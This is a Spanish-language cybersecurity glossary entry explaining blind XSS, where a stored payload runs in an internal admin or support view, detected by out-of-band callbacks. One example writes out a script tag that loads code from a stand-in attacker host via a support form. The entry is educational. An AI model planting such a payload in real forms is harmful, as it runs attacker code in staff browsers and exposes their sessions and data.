Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 104

XSS Ciego

¿Qué es XSS Ciego?

XSS CiegoVariante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno.


El XSS ciego es una subclase del XSS almacenado en la que el script malicioso no se ejecuta en el navegador del atacante, sino en un contexto distinto y normalmente privilegiado: la vista de un ticket de soporte, una consola de revisión de fraude, un panel interno o un informe de respaldo. El atacante envía la carga mediante un formulario público (contacto, registro, soporte) y espera a que un usuario interno renderice los datos. La detección depende de retrollamadas fuera de banda: el payload exfiltra información a herramientas como XSS Hunter, Burp Collaborator o un servidor DNS/HTTP propio. Las defensas son las del XSS almacenado más una CSP estricta en herramientas internas.

Ejemplos

  1. 01

    Un campo de formulario de soporte con <script src=https://x.atacante/x.js></script> que se ejecuta en el CRM del agente.

  2. 02

    Una cabecera User-Agent registrada en un visor de logs administrativo que no codifica HTML.

Preguntas frecuentes

¿Qué es XSS Ciego?

Variante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.

¿Qué significa XSS Ciego?

Variante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno.

¿Cómo funciona XSS Ciego?

El XSS ciego es una subclase del XSS almacenado en la que el script malicioso no se ejecuta en el navegador del atacante, sino en un contexto distinto y normalmente privilegiado: la vista de un ticket de soporte, una consola de revisión de fraude, un panel interno o un informe de respaldo. El atacante envía la carga mediante un formulario público (contacto, registro, soporte) y espera a que un usuario interno renderice los datos. La detección depende de retrollamadas fuera de banda: el payload exfiltra información a herramientas como XSS Hunter, Burp Collaborator o un servidor DNS/HTTP propio. Las defensas son las del XSS almacenado más una CSP estricta en herramientas internas.

¿Cómo defenderse de XSS Ciego?

Las defensas contra XSS Ciego combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.

¿Cuáles son otros nombres para XSS Ciego?

Nombres alternativos comunes: XSS fuera de banda.

Términos relacionados